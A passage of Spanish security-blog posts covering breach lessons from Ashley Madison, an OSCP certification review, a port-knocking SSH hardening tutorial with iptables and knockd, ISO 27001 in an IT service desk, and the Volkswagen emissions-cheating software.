Este tema hace que enlace con otro caso muy comentado últimamente y que también figura entre las burbujas, seguro que saben a cual me refiero….¿AshleyMadison.com? ¡Correcto, ese es! En este caso el ataque se atribuye a “The Impact Team” pero la noticia no sólo ha sido el robo de la información sino que además se han publicado diversas noticias en las que se referenciaba que la mayoría de las contraseñas usadas en dicha web eran poco o nada robustas (las contraseñas eran del tipo: 123456, 12345, password, DEFAULT, etc…).

Hagamos una reflexión en este punto….¿todas nuestras contraseñas cumplen las siguientes premisas?:

• Secretas
• Robustas
• No repetidas
• Cambiadas periódicamente

Otras de las noticias relacionadas con el caso es que muchos de los datos eran falsos. Imaginemos a alguien cuyos datos hayan salido a la luz y resulte que ha sido otra persona quien le haya suplantado, sólo con ver su nombre ya tendría que dar una buena explicación a su pareja. Por motivos como éste y aunque nos cueste un poco o mucho configurar el perfil de privacidad (es decir tener un control sobre qué datos personales se pueden ver y quién puede verlos) debemos hacerlo puesto que la configuración de privacidad por defecto suele ser baja.

También se habla de la existencia de un robot que creaba perfiles, a modo de anécdota se podría dar la situación de que una pareja pudiera tener algún conflicto porque uno de los dos haya contactado con un perfil inexistente….

Pulsando en otras de las burbujas he accedido a otra página en la que se registran brechas de seguridad que se van produciendo casi a diario.

Como se puede comprobar en dicha página, existen numerosos casos en los que la brecha de seguridad se ha producido por el robo o pérdida de dispositivos móviles de empleados. En estos casos las consecuencias habrían sido menores e incluso puede que no hubiese habido consecuencias si se hubiesen implantado las medidas de seguridad adecuadas en dichos dispositivos.

Recordemos algunas de las medidas de seguridad a implantar en este tipo de dispositivos:

• Establecer una contraseña de acceso al sistema
• Evitar la conexiones a redes wifi públicas
• Cifrar la información contenida en el dispositivo
• Deshabilitar la opción de geoposicionamiento
• Instalación de un antivirus
• Instalación de parches y actualizaciones de seguridad
• No dejar los equipos desatendidos
• Utilizar conexión VPN para enviar o recibir información confidencial
• Hacer copias de seguridad periódicas
• Configurar el bloqueo del equipo tras un periodo de inactividad

Otro de los muchos sucesos que aparecen en esta página se refiere al envío de correos con datos personales por error o descuido del usuario que manda el correo. En este caso me viene a la cabeza lo que ocurrió en el departamento de inmigración australiano cuando un funcionario, accidentalmente, mandó un correo que contenía los datos personales de los asistentes a la cumbre del G20. Entre otros habían datos personales de Obama, Angela Merkel o Putin. Y puestos a recordar, recordemos la importancia de:

• Revisar el campo donde ponemos el destinatario del correo
• Utilizar la copia oculta si mandamos correos a varias personas
• En el caso de ser necesaria la comunicación de datos carácter personal de nivel alto, éstos deberán estar cifrados

En el ámbito nacional, en la sede electrónica de la AEPD existe un procedimiento referente a la notificación de quiebras de seguridad, el cual está fundamentado por lo establecido en el apartado 3 del artículo 41 de la Ley 9/2014, de 9 de mayo, General de Telecomunicaciones (LGT). En la ley se referencia que son los proveedores de servicios de comunicaciones los que deben notificar ante la AEPD las quiebras de seguridad, pero se prevé que con el Reglamente Europeo, esta obligación se haga extensible a otros sectores.

Fuente de la imagen: http://computerworldmexico.com.mx/las-fugas-de-datos-accidentales-encabezan-las-amenazas-internas/

La entrada ¿Quién tiene mis datos? aparece primero en Security Art Work.

(La entrada de hoy corre a cargo de Rafael Paez, colaborador de Security Art Work)

Después de un tiempo sin escribir nada por aquí (por tema de tiempo básicamente), me gustaría hablar sobre la certificación OSCP (Offensive Security Certified Professional), la cual obtuve a principios de año y la cual recomiendo totalmente.

Esta certificación viene de la mano de Offensive Security (creadores de Kali Linux) y es una certificación totalmente práctica destinada a aquellas personas que quieran aprender y/o profundizar en el tema de los test de penetración (tanto de sistemas como de web) y de escalada de privilegios.

En su página web se puede obtener información sobre la certificación y su temario (igual que en otros foros o blogs), pero el objetivo de este post es dar una idea general y compartir mi opinión sobre el curso para aquellas personas que no la conozcan o estén pensando en obtenerla.

La certificación es totalmente on-line y consiste básicamente en:

• Realización de un curso con prácticas de laboratorio (duración a elegir entre uno, dos o tres meses)
• Realización de ejercicios durante el curso (opcionales)
• Examen práctico de 24h de duración
• Entrega de un informe sobre el examen (y “opcionalmente” sobre el laboratorio)

Una vez registrado en el curso, se recibe un PDF y unos vídeos con todo el temario del curso. En ellos, se pueden encontrar varios ejemplos y herramientas muy útiles para realizar un pentest, así como algo de teoría sobre la realización de las pruebas. Como ya he dicho antes, el curso es completamente práctico, por lo que durante el temario se nos proponen diversos ejercicios para probar aquellos conceptos y herramientas que se nos están explicando.

Para la realización del curso, nos conectaremos por VPN a una red que simula la red una empresa (con sus diferentes VLAN) donde cada estudiante tiene una máquina con la que podrá practicar y realizar los ataques de forma segura y legítima. El objetivo del curso es conseguir ser Administrador o root en todos los equipos que forman la red, teniendo que encontrar y explotar las diferentes vulnerabilidades que existen en los equipos que forman la red de la compañía y escalar privilegios en el sistema en los casos que sea necesario.

Una vez finalizado el curso, se deberá superar un examen en el que se debe conseguir acceso como administrador a distintas máquinas en un tiempo máximo de 24 horas y entregar un informe de todo el proceso durante las 24 horas siguientes. Nota: En el momento que yo hice el examen, había un total de 5 máquinas, el mínimo de puntos a obtener es de 70 sobre 100 y cada máquina tenía una puntuación diferente.

El informe final consiste en la explicación y justificación de todo el proceso realizado durante el examen, como si de un informe real de un test de penetración se tratase. Además, se deberá adjuntar el informe de las diferentes vulnerabilidades detectadas durante el laboratorio y los ejercicios planteados durante el temario. En la web del curso podréis encontrar la información más detallada, pero básicamente, el informe del laboratorio y los ejercicios, ayudarán a “aprobar” en el caso de que la nota del examen sea cercana a 70, por lo que yo recomendaría realizarlos (ya que así también practicaremos y veremos diferentes métodos de explotación de vulnerabilidades).

Por último, diré que a pesar de ser una certificación que recomiendo encarecidamente, es cierto que requiere muchas muchas horas de dedicación (no está repetida la palabra “muchas” por error, no :P ), sobre todo si se quiere llegar a comprometer todas las máquinas del laboratorio (unas 50-70 en total si no recuerdo mal).

La entrada Certificación OSCP (Offensive Security Certified Professional) aparece primero en Security Art Work.

¿Quién no ha visto en algún tebeo o película al protagonista golpeando unos puntos concretos en la pared o moviendo unos libros de la librería para que mágicamente se abra un acceso oculto? Quizás surgió de ahí la idea de crear Port Knocking, un script cuyo funcionamiento se podría comparar al de una combinación que permite abrir una caja fuerte.

El objetivo de esta herramienta es habilitar de forma temporal el puerto al que se quiere conectar mediante una serie de llamadas previas a otros puertos (knocks) en un orden determinado. El único requisito previo para que funcione es tener instalado un firewall a nivel local, que será quien habilite y bloquee los accesos realmente. En nuestro caso utilizaremos iptables, el cual ya viene incluido en distribuciones como Debian, junto a iptables-persistent para no perder los cambios que vayamos realizando.

Comenzaremos con una configuración inicial del firewall. En este ejemplo hemos reutilizado una Raspberry Pi con un WordPress y Owncloud instalados a los que no queremos bloquear. Para no extender demasiado la longitud del post, vamos a indicar brevemente los comandos de iptables junto a su utilidad:

1. Habilitar el tráfico a nivel local:

sudo iptables -A INPUT -i lo -j ACCEPT

2. No cerrar el tráfico a conexiones ya establecidas:

sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

3. Permitir el tráfico a servicios como páginas web:

sudo iptables -A INPUT -p tcp --dport <PUERTO> -j ACCEPT

(En nuestro caso usaremos la regla con los puertos 80 y 443).

4. Rechazar todas las demás conexiones:

sudo iptables -A INPUT -j DROP

Estas reglas se aplican inmediatamente. Podemos comprobar que si intentamos abrir una segunda conexión SSH no responde y gracias a la segunda regla que hemos introducido no hemos perdido la conectividad que ya teníamos establecida anteriormente.

Realizamos a continuación la instalación del paquete con sudo apt-get install knockd. Una vez termine, se nos muestra un mensaje de warning para avisarnos que el servicio viene deshabitado por defecto como medida de precaución:

El siguiente paso consiste en configurar los puertos a los que vamos a llamar para que se abra el tráfico SSH hacia nuestro servidor. En la instalación se incluye un ejemplo de fichero de configuración donde se muestran dos acciones: una para abrir el puerto ([openSSH])y otra para cerrarlo ([closeSSH]). En nuestro caso utilizaremos una única acción que cerrará automáticamente la conexión:

[options]
UseSyslog

[SSH]
sequence = 1414,28493,10300
tcpflags = syn
seq_timeout = 15
start_command = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport 22 -j ACCEPT
cmd_timeout = 10
stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

En sequence especificamos los puertos a los que tendremos que llamar en orden para que se ejecute start_command para abrirnos la conexión SSH. Una vez pase el tiempo de cmd_timeout (medido en segundos) se lanzará stop_command para cerrarla de nuevo. En la documentación que aparece en este enlace se pueden ver más opciones de configuración.

Terminaremos habilitando el servicio editando el fichero /etc/default/knockd, donde también podremos especificar la interfaz donde se va a aplicar:

# PLEASE EDIT /etc/knockd.conf BEFORE ENABLING
START_KNOCKD=1

# command line options
#KNOCKD_OPTS="-i eth1"

Relanzamos el servicio con sudo service knockd restart y ya tendremos preparado el servidor. Para acceder en la parte del cliente utilizaremos el comando knock para llamar a los diferentes puertos, aunque se pueden usar otras opciones como nmap.

Mostramos a continuación un ejemplo de cómo se realizaría la conexión con ambos métodos. Destacar que, aunque es más sencillo con knock, es posible que en alguna situación no dispongamos del mismo, pero que ello no nos limita a la hora de poder establecer la conexión.

KNOCK: knock 192.168.1.50 1414 28493 10300
NMAP:  for x in 1414 28493 10300; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.1.50 && sleep 1; done && ssh pi@192.168.1.50

Fuentes: Zeroflux

La entrada Knocking on servers doors aparece primero en Security Art Work.

Después de medio año trabajando en un centro de servicios, he de decir que el número de incidencias que se tratan al cabo del día, semana o mes, es increíblemente mayor del que yo pensaba cuando entré, sin contar la atención a usuarios o proyectos determinados. Bueno, en realidad es mucho más mayor del que yo pensaba cuando me explicaron en la universidad el concepto de centro de servicios TI.

La gestión de incidencias es uno de los pilares de un centro de servicios TI, engloba desde algo tan simple como la configuración de IE en un equipo de un usuario por escritorio remoto hasta la monitorización del estado de la infraestructura de la organización. Pero la realidad es que en todas las incidencias que trataba, resolvía o escalaba a otro nivel o departamento, no me daba cuenta del conjunto de implicaciones en materia de seguridad de la información que atañe a un centro de servicios TI.

Y es que, tras cambiar de departamento y profundizar en conceptos más teóricos y menos técnicos relacionados con las normativas aplicables a las TI, mi punto de vista ha cambiado significativamente. En concreto, tras la lectura de las normas ISO 27001 e ISO 27002, he podido percibir y darme cuenta de la importancia que tiene seguir de manera correcta los procedimientos establecidos en un SGSI, especialmente en un centro de servicios. Seguía estos procedimientos sin apenas percatarme de ello.

Sin ir más lejos, si analizamos el proceso que conlleva la gestión de activos (Dominio 8 Gestión de activos) podemos observar que una inadecuada implantación del mismo supondría problemas tales como no conocer quién es el propietario de un activo. Este hecho impediría poder asegurar si un activo está inventariado o no, al igual que no conocer si está correctamente clasificado.

Otro claro ejemplo de la importancia de tener documentado cada procedimiento se puede ver en el control de acceso (Dominio 9 Control de acceso). Sin estos procedimientos, no se sabría quién o quiénes deben acceder a una u otra información y de qué manera pueden usarla.

Tener controlada cualquier caída a partir de la monitorización de los procesos, conocer en qué momento se requiere de mayor espacio en un servidor (Control 12.1.3 Gestión de capacidades), detectar si alguien ha accedido a la CMDB o ha modificado un activo, realizar las actualizaciones pertinentes del software operacional, son ejemplos concretos que definen el control que debe seguir una organización para que su información e infraestructura sea segura.

Y es que se tratan aspectos como el control del software en explotación (Dominio 12 Seguridad de las operaciones), la seguridad de las comunicaciones (Dominio 13 Seguridad en las comunicaciones), la relación con los proveedores (Dominio 15 Relación con proveedores), la gestión de incidentes de la seguridad de la información y hasta la atención de usuarios (Service Desk), con el fin de cumplir y preservar la continuidad y eficiencia de los procesos de negocio.

Sin duda, tras haber pasado por el centro de servicios y ahora estar profundizando en las normativas de la familia 2700X, me atrevo a decir que disponer de un centro de servicios de TI que se apoye en estas normativas, es sinónimo de tranquilidad a la hora de garantizar la disponibilidad, confidencialidad e integridad de la información que posee una empresa.

Sin olvidarnos de los más importante, la optimización en la gestión de los servicios de TI corporativos.

Fuente de la imagen: https://www.manageengine.com/products/service-desk/images/desktop-central.gif

La entrada Principales aspectos de seguridad en un centro de servicios aparece primero en Security Art Work.

Recientemente la marca alemana de automoción Volkswagen (en adelante VW) ha visto cómo su imagen corporativa quedaba seriamente dañada a raíz de las investigaciones llevadas a cabo por la EPA (la Agencia de Protección Medioambiental Estadounidense) en colaboración con otros organismos del país.

La EPA – cuyo objetivo es certificar el cumplimiento de las regulaciones en materia medioambiental en suelo americano – observó que los vehículos de la empresa alemana presentaban serias discrepancias entre los resultados obtenidos en las pruebas de ‘laboratorio’ y aquellos recabados durante los test de calle. Así, observaron que los resultados obtenidos durante las pruebas de laboratorio – que convenientemente concordaban con los datos proporcionados por el fabricante – ofrecían niveles de emisión de gases muy inferiores a los obtenidos durante las pruebas de calle. Pues bien, hoy sabemos que la empresa alemana llevaba desde 2009 instalando en las unidades de control de algunos de sus modelos un software que era capaz de conseguir aprobar de manera fraudulenta los test de emisión de gases a los que era sometido el vehículo.

Las consecuencias no se hicieron esperar; el CEO del grupo VW se ha visto obligado a dimitir y la compañía se enfrenta ahora a multas que pueden alcanzar los 18.000 millones de dólares (solo en EEUU), sin olvidar el tremendo batacazo bursátil por el que los inversores de la firma alemana perdían el 20% del valor de sus acciones. Lo cierto es que las repercusiones que ha tenido y va a tener son muchas, pero lo curioso del caso es cómo lograron los técnicos de VW hacer que los datos de emisión de gases se mantuviesen dentro de los límites que les permitían obtener la certificación.

Para alcanzar su propósito el sistema podía detectar cuándo el vehículo estaba siendo sometido a un test de emisiones, de manera que en ese momento los sistemas de reducción de gases trabajaban a pleno rendimiento. La detección era posible gracias al input que recibía el sistema sobre el uso del volante, acelerador y frenos, datos que le permitían determinar cuándo estaba en un entorno de pruebas. Y ahora bien, si el vehículo era capaz de cumplir con la legalidad, ¿por qué no lo hacían siempre? Pues debido a que el uso de estos sistemas acarrea una serie de inconvenientes tales como el aumento en el consumo de combustible, el incremento en costes de mantenimiento o la reducción del rendimiento del motor, entre otros.

Llegado este punto no pude evitar asociar la capacidad de “ocultación” de este sistema con la que presentan algunos malware que hacen uso de técnicas de detección de sandbox. Como sabemos, el uso de estas técnicas permite al malware detectar cuándo se encuentra en un entorno virtualizado o se están ejecutando determinadas herramientas de análisis y monitorización. En caso de detectarse alguno de los supuestos anteriores el malware detiene su actividad, tratando de dificultar así la tarea de los analistas de seguridad. En este caso y, siempre salvando las distancias, el sistema de Volkswagen actúa en cierto modo como un troyano pues, al fin y al cabo, está tratando de hacer pasar desapercibido un comportamiento no esperado (por nadie salvo por la propia VW, lógicamente) de acuerdo a las especificaciones y los datos proporcionados por el fabricante.

Aunque las razones que han llevado a la firma alemana a instalar en sus vehículos este pseudomalware puedan haber sido estrictamente mercantiles y económicas, lo cierto es que se trata de un intento deliberado y reiterado de una empresa por incumplir la normativa de los organismos reguladores de varios países del mundo. Sin duda unas cuantas líneas de código que van a dar muchos quebraderos de cabeza.

Referencias:

• https://www.newscientist.com/article/dn28240-how-did-volkswagen-cheat-in-tests-and-can-it-fix-affected-cars/
• http://arstechnica.com/cars/2015/09/volkswagen-admits-11-million-diesel-cars-have-sneaky-software-installed/
• http://business.financialpost.com/news/transportation/volkswagen-under-investigation-in-canada-as-country-threatens-action-over-pollution-masking-scandal

La entrada El caso Volkswagen aparece primero en Security Art Work.